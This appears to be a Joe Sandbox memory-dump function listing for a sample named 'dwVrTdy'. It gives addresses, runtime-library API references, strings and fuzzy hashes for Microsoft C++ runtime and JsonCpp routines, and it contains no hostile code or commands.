Function 00007FF643F472E0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F4730B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F47330
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F4735A
std::_Facet_Register.LIBCPMT ref: 00007FF643F473D1
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F473EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F47413

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
Instruction ID: 6410f694d1822307a815a7d66e5acc485e1159d5014437e842ce68d71023327c
Opcode Fuzzy Hash: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
Instruction Fuzzy Hash: FB317322A0CA4281EAA0FB15E5821BA7360FB74B94F084132DE9DA77E6DF3CE4459740

Function 00007FF643F43430 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F4345B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F43480
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F434AA
std::_Facet_Register.LIBCPMT ref: 00007FF643F43521
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F4353B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F43563

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
Instruction ID: ce72049139bd0c935ba8b0d5236b3bbd176efefbd6a7bf80f22b4219c93a84e2
Opcode Fuzzy Hash: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
Instruction Fuzzy Hash: 2E31B322A0CA4284FAA1FF15F5521B97360FB64B98F084132EA8DE77E6DF3CE4519700

Function 00007FF643F56B70 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F56B9B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F56BC0
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F56BEA
std::_Facet_Register.LIBCPMT ref: 00007FF643F56C61
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F56C7B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F56CA3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
Instruction ID: 647f8b58a589498ce2497a6d6005eb5018074f66346d3a4d7989c980932ef44a
Opcode Fuzzy Hash: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
Instruction Fuzzy Hash: CD319562A0CA0284FA90FF15E4461B97360FB547D8F489132DA9D977E6DF3CE441D700

Function 00007FF643F5F3A0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F5F3B5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F5F3DA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F5F404
std::_Facet_Register.LIBCPMT ref: 00007FF643F5F47B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F5F49C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F5F4AF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
Instruction ID: a4dd547ef673d15dc7be36950197c79b1c0b84355d9871d95ed9b3f2b1a65688
Opcode Fuzzy Hash: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
Instruction Fuzzy Hash: D931A122A0DB42C1FA85BB55D4425B96321EB54BA0F0C8532EE5DE77E6DE7CE442A300

Function 00007FF643F65CD0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF643F65E6E
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF643F66197

Strings

csm, xrefs: 00007FF643F65E17
csm, xrefs: 00007FF643F65E95
csm, xrefs: 00007FF643F65DB5

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
Instruction ID: 0b026971760f6afdcfa8805ec22bbc6543f2fb7b54f75512bd7541f7a828884a
Opcode Fuzzy Hash: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
Instruction Fuzzy Hash: 63E1A17290C6828AEB90FF24D4822AD77A0FB55748F152135DE8DA76D6DF3CE486DB00

Function 00007FF643F22E20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F22E8B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F22ED3
_Getctype.LIBCPMT ref: 00007FF643F22EEB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F22F7B

Strings

bad locale name, xrefs: 00007FF643F22F9E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2967684691-1405518554
Opcode ID: 8b208ad68de6242f5f08806ea59c8bdb97e470cb0bca67ad8fd033dff58c0110
Instruction ID: 4ce3f5c1ce5018fc30102dc29e48ce2a604f32e5a858202192b9f3422fdaca37
Opcode Fuzzy Hash: 8b208ad68de6242f5f08806ea59c8bdb97e470cb0bca67ad8fd033dff58c0110
Instruction Fuzzy Hash: 21414822B0DB81D9EB90FFB0D4522FC33A4AF44748F044435DE8DB7AAADE399516A344

Function 00007FF643F28CC0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F28D99

Strings

exists, xrefs: 00007FF643F28F47
status, xrefs: 00007FF643F28F58

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_fs_code_page
String ID: exists$status
API String ID: 1686256323-1990824825
Opcode ID: f06e2ffcdc494b7c5119ab9b591de6b65a472f2ade76fd56745bacc6e474f3cc
Instruction ID: f79a459bf4f8059d09eeb9e70598964e58f8f30bab22f6606ec0970a30c1e694
Opcode Fuzzy Hash: f06e2ffcdc494b7c5119ab9b591de6b65a472f2ade76fd56745bacc6e474f3cc
Instruction Fuzzy Hash: B141B223F18A829AF740FBA4D5022EC2371AB54758F904636DE5DB3AD9EE38D546D340

Function 00007FF643F6875C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF643F68781
GetProcAddress.KERNEL32 ref: 00007FF643F68797
FreeLibrary.KERNEL32 ref: 00007FF643F687BE

Strings

mscoree.dll, xrefs: 00007FF643F68778
CorExitProcess, xrefs: 00007FF643F68790

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
Instruction ID: 5873a49c98f13a53c6af08ec0cfbd1a2f5652b664d4d5cacfc9f464e8a1d36b8
Opcode Fuzzy Hash: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
Instruction Fuzzy Hash: BDF04F61A1DB42C1EA90BF24E4467796330BF89B61F941239CA6D9B2F4DF2CD449A700

Function 00007FF643F650D0 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF643F651F3
__AdjustPointer.LIBCMT ref: 00007FF643F6523E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
Instruction ID: c50a8ddf71d309ea37ec954a241343ba57ecc8fe2fc93c807502c90054bb43b6
Opcode Fuzzy Hash: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
Instruction Fuzzy Hash: 09B1E421A0EA4281EAE5FF1194526796390AF64F84F18A435DE4EB77C6DF3CF443AB40

Function 00007FF643F62440 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF643F624C7
MultiByteToWideChar.KERNEL32 ref: 00007FF643F62549
SysAllocString.OLEAUT32 ref: 00007FF643F62556

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: a41ae39b44eb095044cb99d6d411043c580d0bcf5211e788468cf883008e4936
Instruction ID: fa12482c7ab272fa5cb2163507d8f05f2e59517fb9047fac9f4849294a8cb236
Opcode Fuzzy Hash: a41ae39b44eb095044cb99d6d411043c580d0bcf5211e788468cf883008e4936
Instruction Fuzzy Hash: 7B411821A0C7469AEBE4BFA1D4627782290EF44BA4F146634ED6DE77E5DF3CD4829300

Function 00007FF643F7E990 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF643F7E9B8
_set_statfp.LIBCMT ref: 00007FF643F7E9D3
_set_statfp.LIBCMT ref: 00007FF643F7E9EF
_set_statfp.LIBCMT ref: 00007FF643F7EA2B

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
Instruction ID: e015b39e54820087b136d6ca0b791e0e94b9a4bcb3fd75764653d63c5e676c08
Opcode Fuzzy Hash: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
Instruction Fuzzy Hash: DF118F23E1CA1312F6D831A9E48337592616F64374F450736EAAEB72DACF2CA840A110

Function 00007FF643F771C4 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F771E3
FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F77202
FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F7722A
FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F7723B
FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F7724C

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
Instruction ID: a0a21d9c8537de6bf93688ecf55c1a2481548b6ef87f5773b0a6135ed37f1260
Opcode Fuzzy Hash: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
Instruction Fuzzy Hash: 82118B20F1EB4241FAD8B725A55317A61425F54BB0F844738E83DFBBCADF6CE485A600

Function 00007FF643F77058 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF643F77069
FlsSetValue.KERNEL32 ref: 00007FF643F77088
FlsSetValue.KERNEL32 ref: 00007FF643F770B0
FlsSetValue.KERNEL32 ref: 00007FF643F770C1
FlsSetValue.KERNEL32 ref: 00007FF643F770D2

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
Instruction ID: dfb60210c29031a0869df45d9b8dc9ac7821d1118d5734df17ac2be479f1fc2e
Opcode Fuzzy Hash: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
Instruction Fuzzy Hash: F6110520A1E64346FAE8B32598674B911424F54770F580B38E93EEB2E6DF6DF486B211

Function 00007FF643F5C1C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5C642
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5C648
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5C64E

Strings

, xrefs: 00007FF643F5C23F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-3916222277
Opcode ID: b132b125278c632f91b0463666795c4ad9e361d8f037111066a4675e2791e404
Instruction ID: aa0d886845725a7ca721f6c1648c63057fed493cc99c6293eda4ad2abb4da75e
Opcode Fuzzy Hash: b132b125278c632f91b0463666795c4ad9e361d8f037111066a4675e2791e404
Instruction Fuzzy Hash: 11D1A662E0CA5280EB90FF65D4462AC23A1FB15BD8F149136DD1EB76DADF38D881E350

Function 00007FF643F79D2C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 221COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7A00B

Part of subcall function 00007FF643F84E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F84E45

Strings

ccs, xrefs: 00007FF643F79F46
UTF-16LEUNICODE, xrefs: 00007FF643F79FA9
UTF-8, xrefs: 00007FF643F79F8A

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
Instruction ID: 9924c005f92b8a26c6ce6ee18037a0e55afd81132ee0c31d5601a9bcd63aa745
Opcode Fuzzy Hash: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
Instruction Fuzzy Hash: B681D072E1C20285FBE4BF29C15267A2AA1EB11B48F558035DA4DF7AD4DF2DE842B311

Function 00007FF643F79A68 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F79D11

Part of subcall function 00007FF643F85010: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F8502D

Strings

ccs, xrefs: 00007FF643F79C5D
UTF-16LEUNICODE, xrefs: 00007FF643F79CB5
UTF-8, xrefs: 00007FF643F79C94

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
Instruction ID: f0aa9d7f59109e65e3c7cb8e4c8c11b00c51a3b337ff476a2f379507ec3c2ca7
Opcode Fuzzy Hash: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
Instruction Fuzzy Hash: 8E81DE72E0C24385FBE87E2D965627A2AD0AF13748F555035CA0EE3ED9DF2DA941B301

Function 00007FF643F66444 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF643F664B4
_CallSETranslator.LIBVCRUNTIME ref: 00007FF643F664FF

Strings

MOC, xrefs: 00007FF643F664C8
RCC, xrefs: 00007FF643F664D0

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
Instruction ID: 777bcae31b05b83cdc706405aee56ee639d55ad95217bbe4ded71ae4be33a9a1
Opcode Fuzzy Hash: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
Instruction Fuzzy Hash: EB91C373A087818AE750EB64E4512AC7BB0F744788F10513AEE8DA7795DF3CD596DB00

Function 00007FF643F599C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F59BD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F59BDD

Part of subcall function 00007FF643F57870: __std_exception_copy.LIBVCRUNTIME ref: 00007FF643F578CD

Strings

in Json::Value::setComment(): Comments must start with /, xrefs: 00007FF643F59C15
assert json failed, xrefs: 00007FF643F59BE3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
API String ID: 1944019136-3359747093
